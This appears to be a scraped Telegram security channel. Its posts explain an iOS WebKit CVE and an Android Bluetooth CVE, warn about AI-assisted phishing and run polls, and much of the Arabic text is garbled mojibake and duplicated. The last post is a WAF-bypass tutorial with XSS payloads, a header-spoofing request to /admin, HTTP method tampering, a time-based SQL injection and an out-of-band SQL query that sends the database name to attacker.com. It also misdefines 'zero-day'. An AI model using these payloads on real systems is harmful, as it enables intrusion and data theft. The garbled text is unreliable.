Letโs Talk About a Zero-Day in iPhone ๐
Whatโs up, Spider? What are you talking about? ๐
Alright, let me break it down for you. ๐
๐จ Content Warning: This channel holds copyright rights. โญ
---
Today's Topic: CVE-2025-24201
This vulnerability is classified as a zero-day because it was discovered on March 14 ๐.
The flaw was found in the WebKit browser engine.
Wait a minute... isnโt WebKit the engine used in Safari?
Yes, my friend, you got that right! Do you own an iPhone or what?
---
Whatโs the Type of This Vulnerability?
๐ Out-of-Bounds Write
What does that mean? ๐ค
Well, normally, when writing data to memory, there should be security boundaries that prevent modification of unauthorized memory locations. However, this vulnerability bypasses those boundaries, allowing an attacker to execute Remote Code Execution (RCE) on the target device.
---
Which Devices Are Affected?
The vulnerability affects the following systems:
iOS 18.3.2 and earlier
iPadOS 18.3.2 and earlier
macOS Sequoia 15.3.2 and earlier
Safari 18.3.1 and earlier
visionOS 2.3.2 and earlier
---
How to Protect Yourself?
โ Update to the latest iOS version.
โ Install antivirus and security software.
โ Be cautious of suspicious content and links.
---
Source of the CVE:
https://nvd.nist.gov/vuln/detail/CVE-2025-24201
Whatโs up, Spider? What are you talking about? ๐
Alright, let me break it down for you. ๐
๐จ Content Warning: This channel holds copyright rights. โญ
---
Today's Topic: CVE-2025-24201
This vulnerability is classified as a zero-day because it was discovered on March 14 ๐.
The flaw was found in the WebKit browser engine.
Wait a minute... isnโt WebKit the engine used in Safari?
Yes, my friend, you got that right! Do you own an iPhone or what?
---
Whatโs the Type of This Vulnerability?
๐ Out-of-Bounds Write
What does that mean? ๐ค
Well, normally, when writing data to memory, there should be security boundaries that prevent modification of unauthorized memory locations. However, this vulnerability bypasses those boundaries, allowing an attacker to execute Remote Code Execution (RCE) on the target device.
---
Which Devices Are Affected?
The vulnerability affects the following systems:
iOS 18.3.2 and earlier
iPadOS 18.3.2 and earlier
macOS Sequoia 15.3.2 and earlier
Safari 18.3.1 and earlier
visionOS 2.3.2 and earlier
---
How to Protect Yourself?
โ Update to the latest iOS version.
โ Install antivirus and security software.
โ Be cautious of suspicious content and links.
---
Source of the CVE:
https://nvd.nist.gov/vuln/detail/CVE-2025-24201
โค3
Forwarded from SPIDER SECURITY
ู
ุญุชูู ุจูุฑู ูููู ุงู โจ
Anonymous Poll
74%
ูุฑูู ูุงุญู
ุฑ : red team
5%
ูุฑูู ูุงุฒุฑู : blue team
21%
ุฐูุงุก ุงุตุทูุงุนู : ai
๐2
ูุงู ุฑุณูู ุงููู ุนููู ุงูุตูุงุฉ ูุงูุณูุงู
(ุงุฐุง ู
ุงุช ุงุจู ุงุฏู
ุงููุทุน ุนู
ูู ุงูุง ู
ู ุซูุงุซ ุตุฏูุฉ ุฌุงุฑูุฉ ุงู ุนูู
ููุชูุน ุจู ุงู ููุฏ ุตุงูุญ ูุฏุนู ูู)
โค2
ุจูุณุช ุงูููุงุฑุฏู ู
ููุณ ุจูู ุงูุฐูุงุก ุงูุงุตุทูุงุนู ู ุงูุณุงูุจุฑ ุณูููุฑุชู ๐
ุชุญุฐูุฑูู
ูุงูู : ุงูููุงู ุบูุฑ ู ุณุคููู ุนู ุงูุฐู ุณูู ูุชู ู ุง ูุชู ูุนููุง ู ู ุงูุดุฎุต ุฏุง ู ูุงู ุนูู ู ู ู ููุฏ
ุงูุชุงูู : ุงูููุงู ูููุง ุญููู ุทุจุน ู ูุดุฑ ุนุงูุฒูุง ุชุฏุฎู ุชููู ูู ุฎุงุต
ูุฑุฌุน ู ู ูุถูุนูุง ๐
ุงูููุชู ุจูู ุจูุญุตู ุงุนู ุงู ุจูู ุงูุฐูุงุก ุงูุงุตุทูุงุนู ู ุงูุณุงูุจุฑ ุณูููุฑุชู ู ู ููู ุงุนู ุงู ููุดููุฌ
ูู ููุดููุฌ ูุณุจุงูุฏุฑ ๐ฑ
ุจุต ูุนุฒูุฒู ุนุดุงู ุนุงุฑู ุงูุช ุฏูููุชู ุจุชููู ุงู ุงูููุดููุฌ ุฏุง ุงุฎุชุตุงุฑ ุงู ุงูููุดููุฌ ุฏุง ุจูููู ุตูุญู ู ุฒูุฑู ุจุชูุชุจ ุจููุง ุจูุงูุงุชู ู ุจุชุฑูุญ ู ุตุงุญุจ ุงูุตูุญู ู ุจุชููู ุดุจู ุงูู ููุน ุงูุญูููู ุจุธุจุท
ุงูู ูู ุงูููุชู ุจูู ูู ูุงุณ ูู ุงูุฑูุจุง ุชุญุฏูุฏุง ุจูุณุชุฎุฏู ู ai ( ู ุด ู ุชุนูู ูู ุจุฑู ุฌู ) ุนุดุงู ููุชุจ ููุฏ ุตูุญู ู ุฒูุฑู ุดุจู Facebook ู ุงูุช ุชุฏุฎู ุนูููุง ู ูุฌุงู ุชููู ุญุณุงุจู ุฑุงุญ ุฏุง ุบูุฑ ุงูู ุจูููู ุนูุฏู ุนููุงูู ( ip ) ู ุนู ุทุฑูู ip ููุฏุฑ ูุฌูุจู ู ุจุนุฏูุง ุทูุฑู ุงูู ูุถูุน ุจูู ุจูุณุชุฎุฏู ู ุงูุฐูุงุก ุงูุงุตุทูุงุนู ุนูู ุงุณุงุณ ุงููู ุญุฏ ู ู ุจูู ุงู ูุฌู ู ุดููุฑ ู ูููู ูู ู ู ููู ุงูููุช ุงู ููู ูู ุจุฑ ููู ููู ู ู ู ููู ุงูููุช ูุนู ู ููุฏูู ุนูู ุงุณุงุณ ุงูู ูุฌู ุฏุง ุงู ุงูุดุฎุต ุฏุง ู ููู ูู ุจุฑ ุจูุบูุฑ ุงูุตูุช ุงูู ูุถูุน ุฏุง ูุงูุจ ุฃูุฑูุจุง ูููุง ู ุฎูู ุจุงููู โค๏ธ
ุงูุญู ุงู ุทูุจ ูุง ุณุจุงูุฏุฑ ๐
ุจุต ุงูู ุญุงุฌู
ู ุด ุชุฑุฏ ุนูู ุฑูู ุบุฑูุจ ูุนูู ูู ูููุช ุฑูู ู ุจููููู ุงูุง ู ุญู ุฏ ุฑู ุถุงู ู ุจููููู ุนููุงูู ู ุฑูู ุงูููุฒู ูููู ุงูุช ุญู ุถุงู
ู ุด ุชูุจู ุงู ุงูููุช ููู ุบูุฑ ูู ุง ุชุชุงูุฏ ุงูู ุดุฎุต ุญูููู
ู ุด ุชุฑุฏ ุนูู ุงู ุฑุณุงูู ู ุฌูููู ูู sms ุงู ุงููุงุชุณ ุงู ุงู
ู ุด ุชุฏุฎู ุนูู ููููุงุช ู ุดุจููุฉ ูุนูู ู ุซูุง
www.fecebook.com
ุงูุตุญู ุชุดูุฑ ุงูุจูุณุช ูู ุฎูุฑ ู ุด ุดุฑุท ูุชุงุจู ู ุญุชูู ููุณู ู ุฌุงูู ูููู ูุชุงุจู ูููุง ุงูุญููู ุทุจุน ู ุงููุดุฑ ุงุชู ูู ุชุฎูู ุจุงููู โค๏ธ
ุชุญุฐูุฑูู
ูุงูู : ุงูููุงู ุบูุฑ ู ุณุคููู ุนู ุงูุฐู ุณูู ูุชู ู ุง ูุชู ูุนููุง ู ู ุงูุดุฎุต ุฏุง ู ูุงู ุนูู ู ู ู ููุฏ
ุงูุชุงูู : ุงูููุงู ูููุง ุญููู ุทุจุน ู ูุดุฑ ุนุงูุฒูุง ุชุฏุฎู ุชููู ูู ุฎุงุต
ูุฑุฌุน ู ู ูุถูุนูุง ๐
ุงูููุชู ุจูู ุจูุญุตู ุงุนู ุงู ุจูู ุงูุฐูุงุก ุงูุงุตุทูุงุนู ู ุงูุณุงูุจุฑ ุณูููุฑุชู ู ู ููู ุงุนู ุงู ููุดููุฌ
ูู ููุดููุฌ ูุณุจุงูุฏุฑ ๐ฑ
ุจุต ูุนุฒูุฒู ุนุดุงู ุนุงุฑู ุงูุช ุฏูููุชู ุจุชููู ุงู ุงูููุดููุฌ ุฏุง ุงุฎุชุตุงุฑ ุงู ุงูููุดููุฌ ุฏุง ุจูููู ุตูุญู ู ุฒูุฑู ุจุชูุชุจ ุจููุง ุจูุงูุงุชู ู ุจุชุฑูุญ ู ุตุงุญุจ ุงูุตูุญู ู ุจุชููู ุดุจู ุงูู ููุน ุงูุญูููู ุจุธุจุท
ุงูู ูู ุงูููุชู ุจูู ูู ูุงุณ ูู ุงูุฑูุจุง ุชุญุฏูุฏุง ุจูุณุชุฎุฏู ู ai ( ู ุด ู ุชุนูู ูู ุจุฑู ุฌู ) ุนุดุงู ููุชุจ ููุฏ ุตูุญู ู ุฒูุฑู ุดุจู Facebook ู ุงูุช ุชุฏุฎู ุนูููุง ู ูุฌุงู ุชููู ุญุณุงุจู ุฑุงุญ ุฏุง ุบูุฑ ุงูู ุจูููู ุนูุฏู ุนููุงูู ( ip ) ู ุนู ุทุฑูู ip ููุฏุฑ ูุฌูุจู ู ุจุนุฏูุง ุทูุฑู ุงูู ูุถูุน ุจูู ุจูุณุชุฎุฏู ู ุงูุฐูุงุก ุงูุงุตุทูุงุนู ุนูู ุงุณุงุณ ุงููู ุญุฏ ู ู ุจูู ุงู ูุฌู ู ุดููุฑ ู ูููู ูู ู ู ููู ุงูููุช ุงู ููู ูู ุจุฑ ููู ููู ู ู ู ููู ุงูููุช ูุนู ู ููุฏูู ุนูู ุงุณุงุณ ุงูู ูุฌู ุฏุง ุงู ุงูุดุฎุต ุฏุง ู ููู ูู ุจุฑ ุจูุบูุฑ ุงูุตูุช ุงูู ูุถูุน ุฏุง ูุงูุจ ุฃูุฑูุจุง ูููุง ู ุฎูู ุจุงููู โค๏ธ
ุงูุญู ุงู ุทูุจ ูุง ุณุจุงูุฏุฑ ๐
ุจุต ุงูู ุญุงุฌู
ู ุด ุชุฑุฏ ุนูู ุฑูู ุบุฑูุจ ูุนูู ูู ูููุช ุฑูู ู ุจููููู ุงูุง ู ุญู ุฏ ุฑู ุถุงู ู ุจููููู ุนููุงูู ู ุฑูู ุงูููุฒู ูููู ุงูุช ุญู ุถุงู
ู ุด ุชูุจู ุงู ุงูููุช ููู ุบูุฑ ูู ุง ุชุชุงูุฏ ุงูู ุดุฎุต ุญูููู
ู ุด ุชุฑุฏ ุนูู ุงู ุฑุณุงูู ู ุฌูููู ูู sms ุงู ุงููุงุชุณ ุงู ุงู
ู ุด ุชุฏุฎู ุนูู ููููุงุช ู ุดุจููุฉ ูุนูู ู ุซูุง
www.fecebook.com
ุงูุตุญู ุชุดูุฑ ุงูุจูุณุช ูู ุฎูุฑ ู ุด ุดุฑุท ูุชุงุจู ู ุญุชูู ููุณู ู ุฌุงูู ูููู ูุชุงุจู ูููุง ุงูุญููู ุทุจุน ู ุงููุดุฑ ุงุชู ูู ุชุฎูู ุจุงููู โค๏ธ
โค2
Forwarded from SPIDER SECURITY
โ ๏ธ Two Warnings Before We Start:
1๏ธโฃ This channel is not responsible for any misuse of the information provided. This is purely for educational purposes.
2๏ธโฃ All rights reserved. If you want to share the content, contact me first.
๐ค AI & Cybersecurity - Phishing Spider ๐ท๏ธ
Artificial intelligence is now being used in cybercrime, and one of the biggest threats is phishing attacks.
What is phishing?
Phishing is when hackers create fake websites that look exactly like real ones (e.g., Facebook) to steal your login credentials.
Whatโs new?
In Europe, even people with no coding skills are now using AI to generate phishing pages that are almost indistinguishable from the original. If you enter your credentials, your account is gone instantly!
Even worse, scammers now use AI-powered tactics to impersonate banks or celebrities:
Deepfake videos to mimic famous people.
Voice cloning to sound like someone you trust.
Fake numbers to contact victims and gain their trust.
This technique is spreading rapidly in Europe, so be careful!
๐ก๏ธ How to Protect Yourself?
โ Do not answer calls from unknown numbers, even if they claim to be a celebrity or a bank official.
โ Do not accept friend requests from suspicious accounts without verifying their identity.
โ Do not reply to unknown messages via SMS, WhatsApp, or other platforms.
โ Do not click on suspicious links, for example:
โ www.fecebook.com instead of www.facebook.com
Share this post to raise awareness! Cybersecurity starts with knowledge. โค๏ธ
1๏ธโฃ This channel is not responsible for any misuse of the information provided. This is purely for educational purposes.
2๏ธโฃ All rights reserved. If you want to share the content, contact me first.
๐ค AI & Cybersecurity - Phishing Spider ๐ท๏ธ
Artificial intelligence is now being used in cybercrime, and one of the biggest threats is phishing attacks.
What is phishing?
Phishing is when hackers create fake websites that look exactly like real ones (e.g., Facebook) to steal your login credentials.
Whatโs new?
In Europe, even people with no coding skills are now using AI to generate phishing pages that are almost indistinguishable from the original. If you enter your credentials, your account is gone instantly!
Even worse, scammers now use AI-powered tactics to impersonate banks or celebrities:
Deepfake videos to mimic famous people.
Voice cloning to sound like someone you trust.
Fake numbers to contact victims and gain their trust.
This technique is spreading rapidly in Europe, so be careful!
๐ก๏ธ How to Protect Yourself?
โ Do not answer calls from unknown numbers, even if they claim to be a celebrity or a bank official.
โ Do not accept friend requests from suspicious accounts without verifying their identity.
โ Do not reply to unknown messages via SMS, WhatsApp, or other platforms.
โ Do not click on suspicious links, for example:
โ www.fecebook.com instead of www.facebook.com
Share this post to raise awareness! Cybersecurity starts with knowledge. โค๏ธ
โค2
ุฒู ู
ุดุฑุญูุง ios ุฌู ุฏูุฑ ูุงูุฏุฑููุฏ
*ุชุญุฐูุฑูู*
ุงูุงูู : ุงูููุงู ุบูุฑ ู ุณุคููู ุนู ูุนู ู ุณุชุฎุฏู
ุงูุชุงูู : ุงูููุงู ูููุง ุญููู ุทุจุน ู ูุดุฑ
ูุฑุฌุน ู ู ูุถูุนูุง ๐
ุงูููุงุฑุฏู ููุชููู ุนู cve ูุฑูุฏ ู ู ููุนู
ูุณู ูุงุฒู ู ู ูุฑูุจ ูุนุชุจุฑ ู ุฑูุฒ ูุนุชุจุฑ
ุฒูุฑู ุฏุงู cve ุงูููุงุฑุฏู ุงุณู ู
CVE-2025-0074
ุงูุชุงุฑูุฎ : 2024 ุฏูุณู ุจุฑ ููู 13 ู 2025 ู ุงุฑุณ ููู 3 ๐
ุจูุนู ู ุงู ุงูcve ุฏุง ูุง ุณุจุงูุฏุฑ ๐
ุจุต ูุนุฒูุฒู ุงูcve ุจูุดุชุบู ุนู ุทุฑูู
ุจููุชูุซ ุจุฏูู ุฑูุฒ ู ุนุงูุง ู ุฏู ูุง ุงุฐู ู ู
ู ุณุชุฎุฏู ููุง ุงุถุงูุงุช ููุง ุงู ุชูุงุฒุช
ูููุงุฑ ุงุจูุถ ูุง ุณุจุงูุฏุฑ ูุนูู ุงูุง ู ู ูู
ุงุดูู ุญุฏ ุนู ู cve ุฏุง ุนูู ุฌูุงุฒู ู ุงูุง ู ุด ุนุงุฑู ๐ฑ
ููููู ุงูู ู ูู ุงู ููุนู ู rce ๐
ุงููู ูุทู ูู ุทู ูุชูู ๐
ูุฑุฌุน ูู ูุถูุนูุง ุงู cve ุจูุดุชุบู ุนู
ุทุฑูู ูุฌู ู UAF ( Use-After-Free )
ู ุงูู ุฑู ุฏู ุจุชูุญ ุงู ุงูุดุฎุต ููุชุจ ููุฏ
ุจุฑู ุฌูุงุช ุฎุจูุซู ( malware ) ุนูู ุฌูุงุฒ
ุงูุถุญูู ุจุฏูู ุนูู ู ูู ู ุงูุซุบุฑู ุชู
ุชูุตูููุง ุงูู ุญุฑุฌู ( Critical )
ุทุจ ุงูุญู ุฏุงููู ุงูุง ุฌูุงุฒู ุงูุฏุฑููุฏ 14
ูุงุงุงุง ูุนุฒูุฒู ููุณููู ุงูููู ุงูู ุจูุจุฏุงุก ู ู ุงูู
ุงูุฏูุฑูุฏ 14 ู ุงูุฏุฑููุฏ 13 ู ุงูุฏุฑููุฏ 12
ู ุงูุฏูุฑูุฏ 11 ุจุณ ุงูุฎุจุฑ ุงูุญูู ู ุด
ุจุชุดุชุบู ุนูู ุงูุฏูุฑูุฏ ูุจู 11 ูุนูู
ุงูุฏุฑููุฏ 9 ุนุงุฏู ู ุงูู ู ูู
ุทูุจ ุงูุญู ุงู ุ
ุงูุญู :
ุชุญุฏุซ ุงุฎุฑ ุงุตุฏุงุฑ ุนูุฏู โ
ุชูุฒู antivirus โ
ู ุด ุชุจูู ูุงุชุญ ุจููุชูุซ ูุชูุฑ โ
ุดูุฑุง ุนูู ุฏุนู ูู ูููุง ุฏุนู ูู ููุง ู ุด
ุทูุฑุช ุงูู ุญุชูู ู ุฏุงูู ุง ุจุญุงูู ุงุทูุฑู
ุจุณุจุจ ุฏุนู ูู ู ุดูุฑุง ๐ค
ู ุตุฏุฑ :
https://www.cve.org/CVERecord?id=CVE-2025-0074
https://vulert.com/vuln-db/CVE-2025-0074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0074
https://www.hkcert.org/security-bulletin/android-multiple-vulnerabilities_20250304
*ุชุญุฐูุฑูู*
ุงูุงูู : ุงูููุงู ุบูุฑ ู ุณุคููู ุนู ูุนู ู ุณุชุฎุฏู
ุงูุชุงูู : ุงูููุงู ูููุง ุญููู ุทุจุน ู ูุดุฑ
ูุฑุฌุน ู ู ูุถูุนูุง ๐
ุงูููุงุฑุฏู ููุชููู ุนู cve ูุฑูุฏ ู ู ููุนู
ูุณู ูุงุฒู ู ู ูุฑูุจ ูุนุชุจุฑ ู ุฑูุฒ ูุนุชุจุฑ
ุฒูุฑู ุฏุงู cve ุงูููุงุฑุฏู ุงุณู ู
CVE-2025-0074
ุงูุชุงุฑูุฎ : 2024 ุฏูุณู ุจุฑ ููู 13 ู 2025 ู ุงุฑุณ ููู 3 ๐
ุจูุนู ู ุงู ุงูcve ุฏุง ูุง ุณุจุงูุฏุฑ ๐
ุจุต ูุนุฒูุฒู ุงูcve ุจูุดุชุบู ุนู ุทุฑูู
ุจููุชูุซ ุจุฏูู ุฑูุฒ ู ุนุงูุง ู ุฏู ูุง ุงุฐู ู ู
ู ุณุชุฎุฏู ููุง ุงุถุงูุงุช ููุง ุงู ุชูุงุฒุช
ูููุงุฑ ุงุจูุถ ูุง ุณุจุงูุฏุฑ ูุนูู ุงูุง ู ู ูู
ุงุดูู ุญุฏ ุนู ู cve ุฏุง ุนูู ุฌูุงุฒู ู ุงูุง ู ุด ุนุงุฑู ๐ฑ
ููููู ุงูู ู ูู ุงู ููุนู ู rce ๐
ุงููู ูุทู ูู ุทู ูุชูู ๐
ูุฑุฌุน ูู ูุถูุนูุง ุงู cve ุจูุดุชุบู ุนู
ุทุฑูู ูุฌู ู UAF ( Use-After-Free )
ู ุงูู ุฑู ุฏู ุจุชูุญ ุงู ุงูุดุฎุต ููุชุจ ููุฏ
ุจุฑู ุฌูุงุช ุฎุจูุซู ( malware ) ุนูู ุฌูุงุฒ
ุงูุถุญูู ุจุฏูู ุนูู ู ูู ู ุงูุซุบุฑู ุชู
ุชูุตูููุง ุงูู ุญุฑุฌู ( Critical )
ุทุจ ุงูุญู ุฏุงููู ุงูุง ุฌูุงุฒู ุงูุฏุฑููุฏ 14
ูุงุงุงุง ูุนุฒูุฒู ููุณููู ุงูููู ุงูู ุจูุจุฏุงุก ู ู ุงูู
ุงูุฏูุฑูุฏ 14 ู ุงูุฏุฑููุฏ 13 ู ุงูุฏุฑููุฏ 12
ู ุงูุฏูุฑูุฏ 11 ุจุณ ุงูุฎุจุฑ ุงูุญูู ู ุด
ุจุชุดุชุบู ุนูู ุงูุฏูุฑูุฏ ูุจู 11 ูุนูู
ุงูุฏุฑููุฏ 9 ุนุงุฏู ู ุงูู ู ูู
ุทูุจ ุงูุญู ุงู ุ
ุงูุญู :
ุชุญุฏุซ ุงุฎุฑ ุงุตุฏุงุฑ ุนูุฏู โ
ุชูุฒู antivirus โ
ู ุด ุชุจูู ูุงุชุญ ุจููุชูุซ ูุชูุฑ โ
ุดูุฑุง ุนูู ุฏุนู ูู ูููุง ุฏุนู ูู ููุง ู ุด
ุทูุฑุช ุงูู ุญุชูู ู ุฏุงูู ุง ุจุญุงูู ุงุทูุฑู
ุจุณุจุจ ุฏุนู ูู ู ุดูุฑุง ๐ค
ู ุตุฏุฑ :
https://www.cve.org/CVERecord?id=CVE-2025-0074
https://vulert.com/vuln-db/CVE-2025-0074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0074
https://www.hkcert.org/security-bulletin/android-multiple-vulnerabilities_20250304
โค2
As We Explained iOS, Now It's Android's Turn!
โ ๏ธ Two Warnings:
1. The channel is not responsible for any misuse of this information.
2. All content is copyrighted. Contact us for permissions.
---
๐ Todayโs Topic: A Unique CVE!
A recently discovered zero-day vulnerability:
CVE-2025-0074
๐ Date of Discovery: December 13, 2024
๐ Security Patch Released: March 3, 2025 ๐
---
๐ฅ What Does This CVE Do?
This vulnerability exploits Bluetooth in a completely silent wayโ
๐ซ No user permission required
๐ซ No additional software needed
๐ซ No special privileges required
๐คฏ So, someone can exploit this CVE on my device without me knowing?
โ Yes! And it allows Remote Code Execution (RCE). ๐
---
๐ ๏ธ How It Works
The attack is based on a Use-After-Free (UAF) vulnerability,
which allows an attacker to inject and execute malicious code (malware) on the victimโs device without their knowledge.
๐จ Severity Level: Critical
---
๐ฑ Affected Devices
Bad news: ๐ข
Affects Android 11, 12, 13, and 14.
Good news: ๐
Does NOT affect Android 9 and lower.
---
โ How to Protect Yourself?
1๏ธโฃ Update to the latest security patch โ
2๏ธโฃ Use a trusted antivirus โ
3๏ธโฃ Keep Bluetooth disabled when not in use โ
---
๐ก Thanks for your support! Your engagement helps me improve the content every day. Stay safe! ๐ค
Source :
https://www.cve.org/CVERecord?id=CVE-2025-0074
https://vulert.com/vuln-db/CVE-2025-0074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0074
https://www.hkcert.org/security-bulletin/android-multiple-vulnerabilities_20250304
โ ๏ธ Two Warnings:
1. The channel is not responsible for any misuse of this information.
2. All content is copyrighted. Contact us for permissions.
---
๐ Todayโs Topic: A Unique CVE!
A recently discovered zero-day vulnerability:
CVE-2025-0074
๐ Date of Discovery: December 13, 2024
๐ Security Patch Released: March 3, 2025 ๐
---
๐ฅ What Does This CVE Do?
This vulnerability exploits Bluetooth in a completely silent wayโ
๐ซ No user permission required
๐ซ No additional software needed
๐ซ No special privileges required
๐คฏ So, someone can exploit this CVE on my device without me knowing?
โ Yes! And it allows Remote Code Execution (RCE). ๐
---
๐ ๏ธ How It Works
The attack is based on a Use-After-Free (UAF) vulnerability,
which allows an attacker to inject and execute malicious code (malware) on the victimโs device without their knowledge.
๐จ Severity Level: Critical
---
๐ฑ Affected Devices
Bad news: ๐ข
Affects Android 11, 12, 13, and 14.
Good news: ๐
Does NOT affect Android 9 and lower.
---
โ How to Protect Yourself?
1๏ธโฃ Update to the latest security patch โ
2๏ธโฃ Use a trusted antivirus โ
3๏ธโฃ Keep Bluetooth disabled when not in use โ
---
๐ก Thanks for your support! Your engagement helps me improve the content every day. Stay safe! ๐ค
Source :
https://www.cve.org/CVERecord?id=CVE-2025-0074
https://vulert.com/vuln-db/CVE-2025-0074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0074
https://www.hkcert.org/security-bulletin/android-multiple-vulnerabilities_20250304
โค2
ุชุญุจ ู
ุญุชูู ุจูุฑู ุงู : what you want tomorrow
Anonymous Poll
69%
Red team : ูุฑูู ูุงุญู
ุฑ
13%
Blue team : ูุฑูู ูุงุฒุฑู
0%
Ai : ุฐูุงุก ุงุตุทูุงุนู
19%
ููุฑุณ ุงูุฌููุฒู ู
ุฏููุน ๐๐ฅ
ุชุนุงูู ูุชููู
ุนู ู
ูุถูุน ู
ูู
ุฌุฏุง ู ุงูู
ูู ุงุฒุงู ูุนู ู bypass ูู
waf ( web application firewall )
ุชุญุฐูุฑ :
1 : ุงูููุงู ุบูุฑ ู ุณุคููู ุนู ุงู ูุนู ุฎุงุฑุฌ ูุงุทุงุฑ ุงูุชุนููู ู
2 : ู ู ููุน ูุดุฑ ุงูู ูุงู ุฏูู ุฐูุฑ ุงุณู ุงููุงู ููู ู ูุดุฑ ุงูู ุนููู ู ูููู ูุง ูู ูู ูุดุฑ ุงููุชุงุจู ุจุญุฏ ุฐุงุชูุง ุงูู ุจ ุงุฐู ู ู ุตุงุญุจ ููุงู
ููุชุฑุถ ุนูุฏูุง ุณููุงุฑูู ู ูุงุญุฏ ูุณู ู
ุญู ุงุตู ุญู ุงุตู ูุงู ูุนุฏ ูููุช ูููู ุซุบุฑู
sql injection
ุดุฑุญ ุณุฑูุน : sql injection ุฏู ุจุชุญูู
ุจุงูููุฏ ูู ุงููุงุฏ sql ุจุชุงุน ู ููุน ุนุดุงู
ุชุณุญุจ ุฏุงุชุง ุฎุงุตู
ุงูู ูู ุญู ุงุตู ูู ุง ุฌู ูุณุชุบู ุซุบุฑู ู ุนุฑูุด
ู ุนุฑูุด ูุนู ููุง exploit ุจุณุจุจ waf
ุทูุจ ุญู ุงุตู ูุนู ู ุงู ุ
ุงูุง ููููู โจ
ุงูู ุญุงุฌู : ุญู ุงุตู ูุฌุฑุจ ููุนุจ ูู
ุจุงูููุฏ ูุนู ู encode ุจุฎุชุตุงุฑ
ุทุจ ุฒู ุงู ูุง ุณุจุงูุฏุฑ ๐ค
ุฒู ุจุงูููุฏ xss
<script>alert(1)</script>
ููุณู ุจุนุฏ ู ุง ุชุนู ู encode url
%22%3E%3CIMG%20sRC=X%20onerror=jaVaScRipT:alert
ุจุงูููุฏ ููุชูุง ุจูุดุชุบู ุนุงุฏู ููู ููุณ ูุงูู
ุทูุจ ููุฑุถ ู ุด ุงุดุชุบู ๐ค
ุชุงูู ุฎุทูู :
ุชูุงุนุจ ูู headers
ุงู ุงูุชูุงุนุจ ูู ุงูููุฏุฑ ุฏู ุ
ุดูู ุชูุงุนุจ ูู ุงูููุฏุฑ ุจุชููู ุงูู ุชุญุงูู
ุชุบูุฑ ุญู ุงูู ุฒู X-Original-URL
ุทูุจ ุงุฒุงู ๐ค
ุจุณูุทู
GET /admin HTTP/1.1
Host: target.com
X-Forwarded-For: 127.0.0.1
ุทูุจ ููุฑุถ ุงููุง ู ุด ุงุดุชุบูุช ูุนู ู ุงู ุ
ููุฌู ูู ุฎุทูู ุชุงูุชู :
ูุฌุฑุจ ูุนุฏู ู HTTP ู ู ูู ูุฎูู
TRACE
ู ูุดุชุบู ู ุนุงูุง
ู ุซุงู
HEAD /admin HTTP/1.1
ุงู
TRACE /admin HTTP/1.1
ุจุฏู get ุงู post
ุทูุจ ููุชุฑุถ ู ุด ุงุดุชุบูุช ๐ค
ููุฌู ูู ุทุฑููู ุงูุฑุงุจุนู :
ุงูุฎุทูู ุฏู ุดุจู ุงูู ูุงุชุช ูููู ุงูุช
ูุชุฌุฑุจ ุชุนุฏู ุงูู ูู ูููู ู ุซูุง xml
ู ุซุงู :
/admin.json
ุทูุจ ููุชุฑุถ ู ุด ุงุดุชุบูุช ๐๐ค
ููููู ุจุฑุฏู ูู ุฎุทูู ุฎุงู ุณู ๐
ุงูุฎุทูู ุงูุฎุงู ุณู :
ู ุฏู ุจุณูุทู ูู waf ุจูููู ู ุด ุนุงุฑู
ููุฑู ุจูู ุงูุญุฑูู ุงูุตุบูุฑู ู ู ุญุฑูู
ุงููุจูุฑ
ุจุชูุฒุฑ ูุง ุณุจุงูุฏุฑ ูุนูู waf ุทูุน ุบุจู ูุฏ
ููููู ุงูู ู ุซุงู
<script>alert(1)</script>
ุฏุง ููุฏ xss ุนุงุฏู
<Script>alert(1)</Script>
ูู ููุณ ุงูููุฏ ุจููุณ ุงูุทุฑููู
ุทูุจ ููุชุฑุถ ู ุด ุงุดุชุบูุช ๐ค
ููููู ูู ุทุฑููู ุณุงุฏุณู :
ุงูุทุฑููู ุฏู ู ู ูู ุชุชูุงุนุจ ู dns ุฎุงุต
ุจู ู ููุน
ู ุซุงู :
SELECT LOAD_FILE(CONCAT('\\\\attacker.com\\',database()));
ุฏุง ุจุงูููุฏ ุนุงุฏู
SELECT * FROM users WHERE id = 1 AND IF(1=1, SLEEP(5), 0);
ุจุนุฏ ุชุนุฏูู
ุทูุจ ูู ูุฌุญุช ุ
ุงุฎุฑ ุทุฑููู ู ููุง ุงูุณุงุจุนู :
ุดูู ุงุตุฏุงุฑ waf ู ุฏูุฑ ุนูู cve ูู
ู ุฌุฑุจ cve ูููู ูุญุฏ ู ุง ุชูุฏุฑ ุชุนู ู bypass
ุดูุฑุง ู ูุฑุงุฆู ุงูู ูุงู ุญุงููุช ุงููู ุฎููู ู ู ูู ุจูู ุดุฆ ๐ค
ูู ุงุฒุงู ูุนู ู bypass ูู
waf ( web application firewall )
ุชุญุฐูุฑ :
1 : ุงูููุงู ุบูุฑ ู ุณุคููู ุนู ุงู ูุนู ุฎุงุฑุฌ ูุงุทุงุฑ ุงูุชุนููู ู
2 : ู ู ููุน ูุดุฑ ุงูู ูุงู ุฏูู ุฐูุฑ ุงุณู ุงููุงู ููู ู ูุดุฑ ุงูู ุนููู ู ูููู ูุง ูู ูู ูุดุฑ ุงููุชุงุจู ุจุญุฏ ุฐุงุชูุง ุงูู ุจ ุงุฐู ู ู ุตุงุญุจ ููุงู
ููุชุฑุถ ุนูุฏูุง ุณููุงุฑูู ู ูุงุญุฏ ูุณู ู
ุญู ุงุตู ุญู ุงุตู ูุงู ูุนุฏ ูููุช ูููู ุซุบุฑู
sql injection
ุดุฑุญ ุณุฑูุน : sql injection ุฏู ุจุชุญูู
ุจุงูููุฏ ูู ุงููุงุฏ sql ุจุชุงุน ู ููุน ุนุดุงู
ุชุณุญุจ ุฏุงุชุง ุฎุงุตู
ุงูู ูู ุญู ุงุตู ูู ุง ุฌู ูุณุชุบู ุซุบุฑู ู ุนุฑูุด
ู ุนุฑูุด ูุนู ููุง exploit ุจุณุจุจ waf
ุทูุจ ุญู ุงุตู ูุนู ู ุงู ุ
ุงูุง ููููู โจ
ุงูู ุญุงุฌู : ุญู ุงุตู ูุฌุฑุจ ููุนุจ ูู
ุจุงูููุฏ ูุนู ู encode ุจุฎุชุตุงุฑ
ุทุจ ุฒู ุงู ูุง ุณุจุงูุฏุฑ ๐ค
ุฒู ุจุงูููุฏ xss
<script>alert(1)</script>
